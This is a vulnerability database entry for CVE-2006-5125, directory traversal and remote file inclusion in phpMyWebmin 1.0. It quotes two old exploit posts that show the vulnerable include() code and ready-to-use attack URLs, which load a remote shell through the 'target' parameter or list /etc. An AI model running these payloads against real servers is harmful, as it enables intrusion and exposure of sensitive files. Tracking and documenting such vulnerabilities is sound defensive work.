CVE-2006-5125
Published 2006-10-03
Priority P4 · 25 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 3.65% (88.2th percentile)
Directory traversal vulnerability in window.php, possibly used by home.php, in Joshua Muheim phpMyWebmin 1.0 allows remote attackers to obtain sensitive information via a directory name in the target parameter, which triggers a directory listing through the opendir function.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joshua_muheim | phpmywebmin | — | — |
No detection rules found.
Exploit-DB
phpMyWebmin 1.0 - 'target' Remote File Inclusion
exploitdb·2006-09-30
CVE-2006-5181 phpMyWebmin 1.0 - 'target' Remote File Inclusion
---
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability
Discovered by XORON(turkish hacker)
URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip
Vuln. Code: include("$target/$folder/preferences.php");
Exploit: /change_preferences2.php?target=http://SH3LL?
/create_file.php?target=http://SH3LL?
/upload_local.php?target=http://SH3LL?
/upload_multi.php?target=http://SH3LL?
Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;)
# milw0rm.com [2006-09-30]
Exploit-DB
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion
exploitdb·2006-09-28
CVE-2006-5125 phpMyWebmin 1.0 - 'window.php' Remote File Inclusion
---
#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: [email protected]
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable File:window.php
$ordner = opendir("$target");
?>
and
include("$target/preferences.php");
if($action != "")
{
include("$action.php");
?>
Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php
# milw0rm.com [2006-09-28]
No writeups or analysis indexed.
http://kernel-32.blogspot.com/2006/09/php-mywebmin-10-remote-file-include.html
http://secunia.com/advisories/22178
http://www.securityfocus.com/bid/20264
http://www.vupen.com/english/advisories/2006/3846
https://exchange.xforce.ibmcloud.com/vulnerabilities/29259
https://www.exploit-db.com/exploits/2451
2006-10-03
Published